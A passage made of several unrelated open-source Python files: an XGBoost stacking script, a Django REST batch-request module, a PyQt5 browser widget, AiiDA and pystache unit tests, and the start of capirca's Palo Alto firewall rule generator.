(1, 6, 0.89, 0.994, 0.0001, 0.02421, 700),
(1, 10, 0.74, 0.908, 0.0005, 0.0141, 1750),
(1, 15, 0.7890, 0.890643, 0.231, 0.21, 900),
(1, 19, 0.78, 0.97453, 0.00009, 0.01, 3900),
(1, 6, 0.77, 0.83, 0, 0.023, 1800),
(1, 8, 0.77, 0.83, 0.001, 0.03, 900),
(1, 7, 0.84, 0.91, 0.00008, 0.021, 3000)
]
# storage structure for forecasts
mvalid = np.zeros((xtrain.shape[0],len(param_grid)))
mfull = np.zeros((xtest.shape[0],len(param_grid)))
## build 2nd level forecasts
for i in range(len(param_grid)):
print("processing parameter combo:", param_grid[i])
# configure model with j-th combo of parameters
x = param_grid[i]
clf = xgb.XGBClassifier(n_estimators=x[6],
nthread=-1,
max_depth=x[1],
min_child_weight=x[0],
learning_rate=x[5],
silent=True,
subsample=x[3],
colsample_bytree=x[2],
gamma=x[2],
seed=seed_value)
# loop over folds - Keeping as pandas for ease of use with xgb wrapper
for j in range(1 ,n_folds+1):
idx0 = xfolds[xfolds.fold5 != j].index
idx1 = xfolds[xfolds.fold5 == j].index
x0 = xtrain[xtrain.index.isin(idx0)]
x1 = xtrain[xtrain.index.isin(idx1)]
y0 = ytrain[ytrain.index.isin(idx0)]
y1 = ytrain[ytrain.index.isin(idx1)]
# fit the model on observations associated with subject whichSubject in this fold
clf.fit(x0, y0, eval_metric="auc", eval_set=[(x1, y1)])
mvalid[idx1,i] = clf.predict_proba(x1)[:,1]
# fit on complete dataset
bst = xgb.XGBClassifier(n_estimators=x[6],
nthread=-1,
max_depth=x[1],
min_child_weight=x[0],
learning_rate=x[5],
silent=True,
subsample=x[3],
colsample_bytree=x[2],
gamma=x[2],
seed=seed_value)
bst.fit(xtrain, ytrain, eval_metric="auc")
mfull[:,i] = bst.predict_proba(xtest)[:,1]
## store the results
# add indices etc
mvalid = pd.DataFrame(mvalid)
mvalid.columns = [model_type + str(i) for i in range(0, mvalid.shape[1])]
mvalid['QuoteNumber'] = id_train
mvalid['QuoteConversion_Flag'] = ytrain
mfull = pd.DataFrame(mfull)
mfull.columns = [model_type + str(i) for i in range(0, mfull.shape[1])]
mfull['QuoteNumber'] = id_test
# save the files
mvalid.to_csv(projPath + 'metafeatures/prval_' + model_type + '_' + todate + '_data' + dataset_version + '_seed' + str(seed_value) + '.csv', index = False, header = True)
mfull.to_csv(projPath + 'metafeatures/prfull_' + model_type + '_' + todate + '_data' + dataset_version + '_seed' + str(seed_value) + '.csv', index = False, header = True) |
<filename>drf_batch_requests/request.py
import json
import re
from io import BytesIO
from urllib.parse import urlsplit
from django.http import HttpRequest
from django.http.request import QueryDict
from django.utils.encoding import force_text
from rest_framework.exceptions import ValidationError
from drf_batch_requests.exceptions import RequestAttributeError
from drf_batch_requests.serializers import BatchRequestSerializer
from drf_batch_requests.utils import get_attribute
class BatchRequest(HttpRequest):
def __init__(self, request, request_data):
super(BatchRequest, self).__init__()
self.name = request_data.get('name')
self.omit_response_on_success = request_data.get('omit_response_on_success', False)
self._stream = BytesIO(request_data['_body'].encode('utf-8'))
self._read_started = False
self.method = request_data['method']
split_url = urlsplit(request_data['relative_url'])
self.path_info = self.path = split_url.path
self.GET = QueryDict(split_url.query)
self._set_headers(request, request_data.get('headers', {}))
self.COOKIES = request.COOKIES
# Standard WSGI supported headers
# (are not prefixed with HTTP_)
_wsgi_headers = ["content_length", "content_type", "query_string",
"remote_addr", "remote_host", "remote_user",
"request_method", "server_name", "server_port"]
def _set_headers(self, request, headers):
"""
Inherit headers from batch request by default.
Override with values given in subrequest.
"""
self.META = request.META if request is not None else {}
if headers is not None:
self.META.update(self._transform_headers(headers))
def _transform_headers(self, headers):
"""
For every header:
- replace - to _
- prepend http_ if necessary
- convert to uppercase
"""
result = {}
for header, value in headers.items():
header = header.replace("-", "_")
header = "http_{header}".format(header=header) \
if header.lower() not in self._wsgi_headers \
else header
result.update({header.upper(): value})
return result
class BatchRequestsFactory(object):
response_variable_regex = re.compile(r'({result=(?P<name>[\w\d_]+):\$\.(?P<value>[\w\d_.*]+)})')
def __init__(self, request):
self.request = request
self.request_serializer = BatchRequestSerializer(data=request.data)
self.request_serializer.is_valid(raise_exception=True)
self.update_soft_dependencies()
self.named_responses = {}
def update_soft_dependencies(self):
for request_data in self.request_serializer.validated_data['batch']:
parents = request_data.get('depends_on', [])
for part in request_data.values():
params = re.findall(
self.response_variable_regex, force_text(part)
)
parents.extend(map(lambda param: param[1], params or []))
request_data['depends_on'] = set(parents)
def _prepare_formdata_body(self, data, files=None):
if not data and not files:
return ''
match = re.search(r'boundary=(?P<boundary>.+)', self.request.content_type)
assert match
boundary = match.groupdict()['boundary']
body = ''
for key, value in data.items():
value = value if isinstance(value, str) else json.dumps(value)
body += '--{}\r\nContent-Disposition: form-data; name="{}"\r\n\r\n{}\r\n'.format(boundary, key, value)
if files:
for key, attachment in files.items():
attachment.seek(0)
attachment_body_part = '--{0}\r\nContent-Disposition: form-data; name="{1}"; filename="{2}"\r\n' \
'Content-Type: {3}\r\n' \
'Content-Transfer-Encoding: binary\r\n\r\n{4}\r\n'
body += attachment_body_part.format(
boundary, key, attachment.name, attachment.content_type, attachment.read()
)
body += '--{}--\r\n'.format(boundary)
return body
def _prepare_urlencoded_body(self, data):
raise NotImplementedError
def _prepare_json_body(self, data):
return json.dumps(data)
def _process_attr(self, attr):
params = re.findall(
self.response_variable_regex, attr
)
if not params:
return attr
for url_param in params:
if url_param[1] not in self.named_responses:
raise ValidationError('Named request {} is missing'.format(url_param[1]))
result = get_attribute(
self.named_responses[url_param[1]].data,
url_param[2].split('.')
)
if result is None:
raise RequestAttributeError('Empty result for {}'.format(url_param[2]))
if isinstance(result, list):
result = ','.join(map(str, result))
if attr == url_param[0]:
attr = result
else:
attr = attr.replace(url_param[0], str(result))
return attr
def updated_obj(self, obj):
"""
For now, i'll update only dict values. Later it can be used for keys/single values/etc
:param obj: dict
:return: dict
"""
if isinstance(obj, dict):
for key, value in obj.items():
obj[key] = self.updated_obj(value)
elif isinstance(obj, str):
return self._process_attr(obj)
return obj
def get_requests_data(self):
return self.request_serializer.validated_data['batch']
def generate_request(self, request_data):
request_data['data'] = self.updated_obj(request_data['data'])
request_data['relative_url'] = self._process_attr(request_data['relative_url'])
if self.request.content_type.startswith('multipart/form-data'):
request_data['_body'] = self._prepare_formdata_body(request_data['data'],
files=request_data.get('files', {}))
elif self.request.content_type.startswith('application/x-www-form-urlencoded'):
request_data['_body'] = self._prepare_urlencoded_body(request_data['data'])
elif self.request.content_type.startswith('application/json'):
request_data['_body'] = self._prepare_json_body(request_data['data'])
else:
raise ValidationError('Unsupported content type')
return BatchRequest(self.request, request_data)
|
<reponame>sequana/sequanix
from PyQt5 import QtCore, Qt
from PyQt5.QtWidgets import QLineEdit
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEnginePage, QWebEngineSettings
# potential resources for improvements:
# https://github.com/ralsina/devicenzo/blob/master/devicenzo.py
class Browser(Qt.QMainWindow):
"""
On purpose, there is no caching so that (if re-generated), the
new content of an HTML is shown.
"""
def __init__(self, url):
Qt.QMainWindow.__init__(self)
# Progress bar
# ------------------------------------------------------------
self.progress = 0
# Main page QWebView
# -------------------------------------------------------------
self.wb = SequanixQWebView(parent=self, titleChanged=self.setWindowTitle)
self.wb.urlChanged.connect(lambda u: self.url.setText(u.toString()))
self.wb.titleChanged.connect(self.adjustTitle)
self.wb.loadProgress.connect(self.setProgress)
self.setCentralWidget(self.wb)
# Main menu tool bar
# -------------------------------------------------------------
self.tb = self.addToolBar("Main Toolbar")
for a in (
QWebEnginePage.Back,
QWebEnginePage.Forward,
QWebEnginePage.Reload,
QWebEnginePage.DownloadLinkToDisk,
):
self.tb.addAction(self.wb.pageAction(a))
self.url = QLineEdit(returnPressed=lambda: self.wb.setUrl(QtCore.QUrl.fromUserInput(self.url.text())))
self.tb.addWidget(self.url)
# status bar ---------------------------------------------------
self.sb = self.statusBar()
try:
# pyqt5.6
self.wb.statusBarMessage.connect(self.sb.showMessage)
except:
pass
self.wb.page().linkHovered.connect(lambda l: self.sb.showMessage(l, 3000))
# Search bar
# ------------------------------------------------------------
self.search = QLineEdit(returnPressed=lambda: self.wb.findText(self.search.text()))
self.search.show()
self.search.hide() # To make ctrl+F effective, need to show/hide ?
# The shortcuts
# ---------------------------------------------------------
self.showSearch = Qt.QShortcut("Ctrl+F", self, activated=lambda: (self.search.show(), self.search.setFocus()))
self.hideSearch = Qt.QShortcut("Esc", self, activated=lambda: (self.search.hide(), self.wb.setFocus()))
self.quit = Qt.QShortcut("Ctrl+Q", self, activated=self.close)
self.zoomIn = Qt.QShortcut("Ctrl++", self, activated=lambda: self.wb.setZoomFactor(self.wb.zoomFactor() + 0.2))
self.zoomOut = Qt.QShortcut("Ctrl+-", self, activated=lambda: self.wb.setZoomFactor(self.wb.zoomFactor() - 0.2))
self.zoomOne = Qt.QShortcut("Ctrl+=", self, activated=lambda: self.wb.setZoomFactor(1))
# Add alt+left and right keys to navigate backward and forward
Qt.QShortcut(QtCore.Qt.AltModifier + QtCore.Qt.Key_Left, self, activated=lambda: self.wb.back())
Qt.QShortcut(QtCore.Qt.AltModifier + QtCore.Qt.Key_Right, self, activated=lambda: self.wb.forward())
# Add components on the page
self.sb.addPermanentWidget(self.search)
# Finally, load the URL
self.wb.load(QtCore.QUrl(url))
try:
self.wb.settings().setObjectCacheCapacities(0, 0, 0)
except Exception:
pass
def adjustTitle(self):
if 0 < self.progress < 100:
self.setWindowTitle("%s (%s%%)" % (self.wb.title(), self.progress))
else:
self.setWindowTitle(self.wb.title())
def setProgress(self, p):
self.progress = p
self.adjustTitle()
class SequanixQWebView(QWebEngineView):
"""This is the webview for the application.
It represents a browser window, either the main one or a popup.
It's a simple wrapper around QWebView that configures some basic settings.
"""
def __init__(self, parent=None, **kwargs):
"""Constructor for the class"""
super().__init__(parent, **kwargs)
self.kwargs = kwargs
# Javascript and other settings
# ------------------------------------------------------------
try:
self.settings().setAttribute(QWebEngineSettings.JavascriptCanOpenWindows, True)
self.settings().setAttribute(QWebEngineSettings.LocalStorageEnabled, True)
self.settings().setAttribute(QWebEngineSettings.PluginsEnabled, True)
except:
print("QtWebKit.QWebSettings not available for you PyQt version")
def createWindow(self, type):
"""Handle requests for a new browser window.
Method called whenever the browser requests a new window
(e.g., <a target='_blank'> or window.open()).
Overridden from QWebView to allow for popup windows, if enabled.
"""
# this = Browser(self.url())
# this.show()
self.popup = SequanixQWebView(**self.kwargs)
self.popup.setObjectName("web_content")
self.popup.setWindowTitle("Sequana browser")
self.popup.page().windowCloseRequested.connect(self.popup.close)
self.popup.show()
return self.popup
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Tests for the :mod:`aiida.engine.daemon.execmanager` module."""
import io
import os
import pytest
from aiida.engine.daemon import execmanager
from aiida.transports.plugins.local import LocalTransport
@pytest.mark.usefixtures('clear_database_before_test')
def test_retrieve_files_from_list(tmp_path_factory, generate_calculation_node):
"""Test the `retrieve_files_from_list` function."""
node = generate_calculation_node()
retrieve_list = [
'file_a.txt',
('sub/folder', 'sub/folder', 0),
]
source = tmp_path_factory.mktemp('source')
target = tmp_path_factory.mktemp('target')
content_a = b'content_a'
content_b = b'content_b'
with open(str(source / 'file_a.txt'), 'wb') as handle:
handle.write(content_a)
handle.flush()
os.makedirs(str(source / 'sub' / 'folder'))
with open(str(source / 'sub' / 'folder' / 'file_b.txt'), 'wb') as handle:
handle.write(content_b)
handle.flush()
with LocalTransport() as transport:
transport.chdir(str(source))
execmanager.retrieve_files_from_list(node, transport, str(target), retrieve_list)
assert sorted(os.listdir(str(target))) == sorted(['file_a.txt', 'sub'])
assert os.listdir(str(target / 'sub')) == ['folder']
assert os.listdir(str(target / 'sub' / 'folder')) == ['file_b.txt']
with open(str(target / 'sub' / 'folder' / 'file_b.txt'), 'rb') as handle:
assert handle.read() == content_b
with open(str(target / 'file_a.txt'), 'rb') as handle:
assert handle.read() == content_a
@pytest.mark.usefixtures('clear_database_before_test')
def test_upload_local_copy_list(fixture_sandbox, aiida_localhost, aiida_local_code_factory):
"""Test the ``local_copy_list`` functionality in ``upload_calculation``.
Specifically, verify that files in the ``local_copy_list`` do not end up in the repository of the node.
"""
from aiida.common.datastructures import CalcInfo, CodeInfo
from aiida.orm import CalcJobNode, SinglefileData
inputs = {
'file_a': SinglefileData(io.BytesIO(b'content_a')).store(),
'file_b': SinglefileData(io.BytesIO(b'content_b')).store(),
}
node = CalcJobNode(computer=aiida_localhost)
node.store()
code = aiida_local_code_factory('arithmetic.add', '/bin/bash').store()
code_info = CodeInfo()
code_info.code_uuid = code.uuid
calc_info = CalcInfo()
calc_info.uuid = node.uuid
calc_info.codes_info = [code_info]
calc_info.local_copy_list = [
(inputs['file_a'].uuid, inputs['file_a'].filename, './files/file_a'),
(inputs['file_a'].uuid, inputs['file_a'].filename, './files/file_b'),
]
with LocalTransport() as transport:
execmanager.upload_calculation(node, transport, calc_info, fixture_sandbox)
assert node.list_object_names() == []
|
<reponame>jakearchibald/pystache
# coding: utf-8
"""
Unit tests of renderengine.py.
"""
import cgi
import unittest
from pystache.context import Context
from pystache.parser import ParsingError
from pystache.renderengine import RenderEngine
from tests.common import assert_strings
class RenderEngineTestCase(unittest.TestCase):
"""Test the RenderEngine class."""
def test_init(self):
"""
Test that __init__() stores all of the arguments correctly.
"""
# In real-life, these arguments would be functions
engine = RenderEngine(load_partial="foo", literal="literal", escape="escape")
self.assertEquals(engine.escape, "escape")
self.assertEquals(engine.literal, "literal")
self.assertEquals(engine.load_partial, "foo")
class RenderTests(unittest.TestCase):
"""
Tests RenderEngine.render().
Explicit spec-test-like tests best go in this class since the
RenderEngine class contains all parsing logic. This way, the unit tests
will be more focused and fail "closer to the code".
"""
def _engine(self):
"""
Create and return a default RenderEngine for testing.
"""
escape = lambda s: unicode(cgi.escape(s))
engine = RenderEngine(literal=unicode, escape=escape, load_partial=None)
return engine
def _assert_render(self, expected, template, *context, **kwargs):
"""
Test rendering the given template using the given context.
"""
partials = kwargs.get('partials')
engine = kwargs.get('engine', self._engine())
if partials is not None:
engine.load_partial = lambda key: unicode(partials[key])
context = Context(*context)
actual = engine.render(template, context)
assert_strings(test_case=self, actual=actual, expected=expected)
def test_render(self):
self._assert_render('Hi Mom', 'Hi {{person}}', {'person': 'Mom'})
def test__load_partial(self):
"""
Test that render() uses the load_template attribute.
"""
engine = self._engine()
partials = {'partial': u"{{person}}"}
engine.load_partial = lambda key: partials[key]
self._assert_render('Hi Mom', 'Hi {{>partial}}', {'person': 'Mom'}, engine=engine)
def test__literal(self):
"""
Test that render() uses the literal attribute.
"""
engine = self._engine()
engine.literal = lambda s: s.upper()
self._assert_render('BAR', '{{{foo}}}', {'foo': 'bar'}, engine=engine)
def test__escape(self):
"""
Test that render() uses the escape attribute.
"""
engine = self._engine()
engine.escape = lambda s: "**" + s
self._assert_render('**bar', '{{foo}}', {'foo': 'bar'}, engine=engine)
def test__escape_does_not_call_literal(self):
"""
Test that render() does not call literal before or after calling escape.
"""
engine = self._engine()
engine.literal = lambda s: s.upper() # a test version
engine.escape = lambda s: "**" + s
template = 'literal: {{{foo}}} escaped: {{foo}}'
context = {'foo': 'bar'}
self._assert_render('literal: BAR escaped: **bar', template, context, engine=engine)
def test__escape_preserves_unicode_subclasses(self):
"""
Test that render() preserves unicode subclasses when passing to escape.
This is useful, for example, if one wants to respect whether a
variable value is markupsafe.Markup when escaping.
"""
class MyUnicode(unicode):
pass
def escape(s):
if type(s) is MyUnicode:
return "**" + s
else:
return s + "**"
engine = self._engine()
engine.escape = escape
template = '{{foo1}} {{foo2}}'
context = {'foo1': MyUnicode('bar'), 'foo2': 'bar'}
self._assert_render('**bar bar**', template, context, engine=engine)
def test__non_basestring__literal_and_escaped(self):
"""
Test a context value that is not a basestring instance.
"""
# We use include upper() to make sure we are actually using
# our custom function in the tests
to_unicode = lambda s: unicode(s, encoding='ascii').upper()
engine = self._engine()
engine.escape = to_unicode
engine.literal = to_unicode
self.assertRaises(TypeError, engine.literal, 100)
template = '{{text}} {{int}} {{{int}}}'
context = {'int': 100, 'text': 'foo'}
self._assert_render('FOO 100 100', template, context, engine=engine)
def test_tag__output_not_interpolated(self):
"""
Context values should not be treated as templates (issue #44).
"""
template = '{{template}}: {{planet}}'
context = {'template': '{{planet}}', 'planet': 'Earth'}
self._assert_render(u'{{planet}}: Earth', template, context)
def test_tag__output_not_interpolated__section(self):
"""
Context values should not be treated as templates (issue #44).
"""
template = '{{test}}'
context = {'test': '{{#hello}}'}
self._assert_render('{{#hello}}', template, context)
def test_interpolation__built_in_type__string(self):
"""
Check tag interpolation with a string on the top of the context stack.
"""
item = 'abc'
# item.upper() == 'ABC'
template = '{{#section}}{{upper}}{{/section}}'
context = {'section': item, 'upper': 'XYZ'}
self._assert_render(u'XYZ', template, context)
def test_interpolation__built_in_type__integer(self):
"""
Check tag interpolation with an integer on the top of the context stack.
"""
item = 10
# item.real == 10
template = '{{#section}}{{real}}{{/section}}'
context = {'section': item, 'real': 1000}
self._assert_render(u'1000', template, context)
def test_interpolation__built_in_type__list(self):
"""
Check tag interpolation with a list on the top of the context stack.
"""
item = [[1, 2, 3]]
# item[0].pop() == 3
template = '{{#section}}{{pop}}{{/section}}'
context = {'section': item, 'pop': 7}
self._assert_render(u'7', template, context)
def test_implicit_iterator__literal(self):
"""
Test an implicit iterator in a literal tag.
"""
template = """{{#test}}{{{.}}}{{/test}}"""
context = {'test': ['<', '>']}
self._assert_render('<>', template, context)
def test_implicit_iterator__escaped(self):
"""
Test an implicit iterator in a normal tag.
"""
template = """{{#test}}{{.}}{{/test}}"""
context = {'test': ['<', '>']}
self._assert_render('<>', template, context)
def test_literal__in_section(self):
"""
Check that literals work in sections.
"""
template = '{{#test}}1 {{{less_than}}} 2{{/test}}'
context = {'test': {'less_than': '<'}}
self._assert_render('1 < 2', template, context)
def test_literal__in_partial(self):
"""
Check that literals work in partials.
"""
template = '{{>partial}}'
partials = {'partial': '1 {{{less_than}}} 2'}
context = {'less_than': '<'}
self._assert_render('1 < 2', template, context, partials=partials)
def test_partial(self):
partials = {'partial': "{{person}}"}
self._assert_render('Hi Mom', 'Hi {{>partial}}', {'person': 'Mom'}, partials=partials)
def test_partial__context_values(self):
"""
Test that escape and literal work on context values in partials.
"""
engine = self._engine()
template = '{{>partial}}'
partials = {'partial': 'unescaped: {{{foo}}} escaped: {{foo}}'}
context = {'foo': '<'}
self._assert_render('unescaped: < escaped: <', template, context, engine=engine, partials=partials)
## Test cases related specifically to sections.
def test_section__end_tag_with_no_start_tag(self):
"""
Check what happens if there is an end tag with no start tag.
"""
template = '{{/section}}'
try:
self._assert_render(None, template)
except ParsingError, err:
self.assertEquals(str(err), "Section end tag mismatch: u'section' != None")
def test_section__end_tag_mismatch(self):
"""
Check what happens if the end tag doesn't match.
"""
template = '{{#section_start}}{{/section_end}}'
try:
self._assert_render(None, template)
except ParsingError, err:
self.assertEquals(str(err), "Section end tag mismatch: u'section_end' != u'section_start'")
def test_section__context_values(self):
"""
Test that escape and literal work on context values in sections.
"""
engine = self._engine()
template = '{{#test}}unescaped: {{{foo}}} escaped: {{foo}}{{/test}}'
context = {'test': {'foo': '<'}}
self._assert_render('unescaped: < escaped: <', template, context, engine=engine)
def test_section__context_precedence(self):
"""
Check that items higher in the context stack take precedence.
"""
template = '{{entree}} : {{#vegetarian}}{{entree}}{{/vegetarian}}'
context = {'entree': 'chicken', 'vegetarian': {'entree': 'beans and rice'}}
self._assert_render(u'chicken : beans and rice', template, context)
def test_section__list_referencing_outer_context(self):
"""
Check that list items can access the parent context.
For sections whose value is a list, check that items in the list
have access to the values inherited from the parent context
when rendering.
"""
context = {
"greeting": "Hi",
"list": [{"name": "Al"}, {"name": "Bob"}],
}
template = "{{#list}}{{greeting}} {{name}}, {{/list}}"
self._assert_render("Hi Al, Hi Bob, ", template, context)
def test_section__output_not_interpolated(self):
"""
Check that rendered section output is not interpolated.
"""
template = '{{#section}}{{template}}{{/section}}: {{planet}}'
context = {'section': True, 'template': '{{planet}}', 'planet': 'Earth'}
self._assert_render(u'{{planet}}: Earth', template, context)
def test_section__nested_truthy(self):
"""
Check that "nested truthy" sections get rendered.
Test case for issue #24: https://github.com/defunkt/pystache/issues/24
This test is copied from the spec. We explicitly include it to
prevent regressions for those who don't pull down the spec tests.
"""
template = '| A {{#bool}}B {{#bool}}C{{/bool}} D{{/bool}} E |'
context = {'bool': True}
self._assert_render(u'| A B C D E |', template, context)
def test_section__nested_with_same_keys(self):
"""
Check a doubly-nested section with the same context key.
Test case for issue #36: https://github.com/defunkt/pystache/issues/36
"""
# Start with an easier, working case.
template = '{{#x}}{{#z}}{{y}}{{/z}}{{/x}}'
context = {'x': {'z': {'y': 1}}}
self._assert_render(u'1', template, context)
template = '{{#x}}{{#x}}{{y}}{{/x}}{{/x}}'
context = {'x': {'x': {'y': 1}}}
self._assert_render(u'1', template, context)
def test_section__lambda(self):
template = '{{#test}}Mom{{/test}}'
context = {'test': (lambda text: 'Hi %s' % text)}
self._assert_render('Hi Mom', template, context)
def test_section__lambda__tag_in_output(self):
"""
Check that callable output is treated as a template string (issue #46).
The spec says--
When used as the data value for a Section tag, the lambda MUST
be treatable as an arity 1 function, and invoked as such (passing
a String containing the unprocessed section contents). The
returned value MUST be rendered against the current delimiters,
then interpolated in place of the section.
"""
template = '{{#test}}Hi {{person}}{{/test}}'
context = {'person': 'Mom', 'test': (lambda text: text + " :)")}
self._assert_render('Hi Mom :)', template, context)
def test_comment__multiline(self):
"""
Check that multiline comments are permitted.
"""
self._assert_render('foobar', 'foo{{! baz }}bar')
self._assert_render('foobar', 'foo{{! \nbaz }}bar')
def test_custom_delimiters__sections(self):
"""
Check that custom delimiters can be used to start a section.
Test case for issue #20: https://github.com/defunkt/pystache/issues/20
"""
template = '{{=[[ ]]=}}[[#foo]]bar[[/foo]]'
context = {'foo': True}
self._assert_render(u'bar', template, context)
def test_custom_delimiters__not_retroactive(self):
"""
Check that changing custom delimiters back is not "retroactive."
Test case for issue #35: https://github.com/defunkt/pystache/issues/35
"""
expected = u' {{foo}} '
self._assert_render(expected, '{{=$ $=}} {{foo}} ')
self._assert_render(expected, '{{=$ $=}} {{foo}} $={{ }}=$') # was yielding u' '.
|
<gh_stars>0
# Lint as: python2, python3
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Palo Alto Firewall generator."""
import collections
import datetime
import logging
import re
from xml.dom import minidom
import xml.etree.ElementTree as etree
from capirca.lib import aclgenerator
from capirca.lib import nacaddr
from capirca.lib import policy
class Error(Exception):
"""generic error class."""
class UnsupportedFilterError(Error):
pass
class UnsupportedHeaderError(Error):
pass
class PaloAltoFWDuplicateTermError(Error):
pass
class PaloAltoFWUnsupportedProtocolError(Error):
pass
class PaloAltoFWVerbatimError(Error):
pass
class PaloAltoFWOptionError(Error):
pass
class PaloAltoFWDuplicateServiceError(Error):
pass
class PaloAltoFWNameTooLongError(Error):
pass
class PaloAltoFWBadIcmpTypeError(Error):
pass
class Term(aclgenerator.Term):
"""Representation of an individual term.
This is mostly useful for the __str__() method.
Attributes:
obj: a policy.Term object
term_type: type of filter to generate, e.g. inet or inet6
filter_options: list of remaining target options (zones)
"""
ACTIONS = {
"accept": "allow",
"deny": "deny",
"reject": "reset-client",
"reject-with-tcp-rst": "reset-client",
}
def __init__(self, term, term_type, zones):
self.term = term
self.term_type = term_type
self.from_zone = zones[1]
self.to_zone = zones[3]
self.extra_actions = []
def __str__(self):
"""Render config output from this term object."""
# Verify platform specific terms. Skip whole term if platform does not
# match.
# Nothing here for now
def _Group(self, group):
"""If 1 item return it, else return [ item1 item2 ].
Args:
group: a list. could be a list of strings (protocols) or a list of tuples
(ports)
Returns:
rval: a string surrounded by '[' and '];' if len(group) > 1
or with just ';' appended if len(group) == 1
"""
def _FormattedGroup(el):
"""Return the actual formatting of an individual element.
Args:
el: either a string (protocol) or a tuple (ports)
Returns:
string: either the lower()'ed string or the ports, hyphenated
if they're a range, or by itself if it's not.
"""
if isinstance(el, str):
return el.lower()
elif isinstance(el, int):
return str(el)
# type is a tuple below here
elif el[0] == el[1]:
return "%d" % el[0]
else:
return "%d-%d" % (el[0], el[1])
if len(group) > 1:
rval = "[ " + " ".join([_FormattedGroup(x) for x in group]) + " ];"
else:
rval = _FormattedGroup(group[0]) + ";"
return rval
class Service(object):
"""Generate PacketFilter policy terms."""
service_map = {}
def __init__(self, ports, service_name,
protocol): # ports is a tuple of ports
if (ports, protocol) in self.service_map:
raise PaloAltoFWDuplicateServiceError(
("You have a duplicate service. "
"A service already exists on port(s): %s") % str(ports))
final_service_name = "service-" + service_name + "-" + protocol
for unused_k, v in Service.service_map.items():
if v["name"] == final_service_name:
raise PaloAltoFWDuplicateServiceError(
"You have a duplicate service. A service named %s already exists." %
str(final_service_name))
if len(final_service_name) > 63:
raise PaloAltoFWNameTooLongError(
"Service name must be 63 characters max: %s" %
str(final_service_name))
self.service_map[(ports, protocol)] = {"name": final_service_name}
class Rule(object):
"""Extend the Term() class for PaloAlto Firewall Rules."""
def __init__(self, from_zone, to_zone, terms):
# Palo Alto Firewall rule keys
MAX_ZONE_LENGTH = 31
if not from_zone or not to_zone:
raise PaloAltoFWOptionError("Source or destination zone is empty.")
if len(from_zone) > MAX_ZONE_LENGTH:
x = "Source zone must be %d characters max: %s" % (MAX_ZONE_LENGTH,
from_zone)
raise PaloAltoFWNameTooLongError(x)
if len(to_zone) > MAX_ZONE_LENGTH:
x = "Destination zone must be %d characters max: %s" % (MAX_ZONE_LENGTH,
to_zone)
raise PaloAltoFWNameTooLongError(x)
self.options = {}
self.options["from_zone"] = [from_zone]
self.options["to_zone"] = [to_zone]
self.ModifyOptions(terms)
def ModifyOptions(self, terms):
"""Massage firewall rules into Palo Alto rules format."""
term = terms.term
self.options["description"] = []
self.options["source"] = []
self.options["destination"] = []
self.options["application"] = []
self.options["service"] = []
self.options["logging"] = []
# COMMENT
if term.comment:
self.options["description"] = term.comment
# LOGGING
if term.logging:
for item in term.logging:
if item.value in ["disable"]:
self.options["logging"] = ["disable"]
break
elif item.value in ["log-both"]:
self.options["logging"].append("log-start")
self.options["logging"].append("log-end")
elif item.value in ["True", "true", "syslog", "local"]:
self.options["logging"].append("log-end")
# SOURCE-ADDRESS
if term.source_address:
saddr_check = set()
for saddr in term.source_address:
saddr_check.add(saddr.parent_token)
saddr_check = sorted(saddr_check)
for addr in saddr_check:
self.options["source"].append(str(addr))
else:
self.options["source"].append("any")
# DESTINATION-ADDRESS
if term.destination_address:
daddr_check = set()
for daddr in term.destination_address:
daddr_check.add(daddr.parent_token)
daddr_check = sorted(daddr_check)
for addr in daddr_check:
self.options["destination"].append(str(addr))
else:
self.options["destination"].append("any")
# ACTION
if term.action:
self.options["action"] = term.action[0]
if term.option:
self.options["option"] = term.option
if term.pan_application:
for pan_app in term.pan_application:
self.options["application"].append(pan_app)
if term.destination_port:
ports = []
for tup in term.destination_port:
if len(tup) > 1 and tup[0] != tup[1]:
ports.append(str(tup[0]) + "-" + str(tup[1]))
else:
ports.append(str(tup[0]))
ports = tuple(ports)
# check to see if this service already exists
for p in term.protocol:
if (ports, p) in Service.service_map:
self.options["service"].append(Service.service_map[(ports,
p)]["name"])
else:
# create service
unused_new_service = Service(ports, term.name, p)
self.options["service"].append(Service.service_map[(ports,
p)]["name"])
if term.protocol:
# Add application "any" to all terms, unless ICMP/ICMPv6
for proto_name in term.protocol:
if proto_name in ["icmp", "icmpv6"]:
continue
elif proto_name in ["igmp", "sctp", "gre"]:
if proto_name not in self.options["application"]:
self.options["application"].append(proto_name)
elif proto_name in ["tcp", "udp"]:
if "any" not in self.options["application"]:
self.options["application"].append("any")
else:
pass
class PaloAltoFW(aclgenerator.ACLGenerator):
"""PaloAltoFW rendering class."""
_PLATFORM = "paloalto"
SUFFIX = ".xml"
_SUPPORTED_AF = set(("inet", "inet6", "mixed"))
_AF_MAP = {"inet": (4,), "inet6": (6,), "mixed": (4, 6)}
_TERM_MAX_LENGTH = 31
_SUPPORTED_PROTO_NAMES = [
"tcp",
"udp",
"icmp",
"icmpv6",
"sctp",
"igmp",
"gre",
]
_MAX_RULE_DESCRIPTION_LENGTH = 1024
_MAX_TAG_COMMENTS_LENGTH = 1023
_TAG_NAME_FORMAT = "{from_zone}_{to_zone}_policy-comment-{num}"
INDENT = " "
def __init__(self, pol, exp_info):
self.pafw_policies = []
self.addressbook = collections.OrderedDict()
self.applications = []
self.application_refs = {}
self.application_groups = []
self.pan_applications = []
self.ports = []
self.from_zone = ""
self.to_zone = ""
self.policy_name = ""
self.config = None
super(PaloAltoFW, self).__init__(pol, exp_info)
def _BuildTokens(self):
"""Build supported tokens for platform.
Returns:
tuple containing both supported tokens and sub tokens
"""
supported_tokens, supported_sub_tokens = super(PaloAltoFW,
self)._BuildTokens()
supported_tokens = {
"action",
"comment",
"destination_address",
"destination_address_exclude",
"destination_port",
"expiration",
"icmp_type",
"logging",
"name",
"option",
"owner",
"platform",
"protocol",
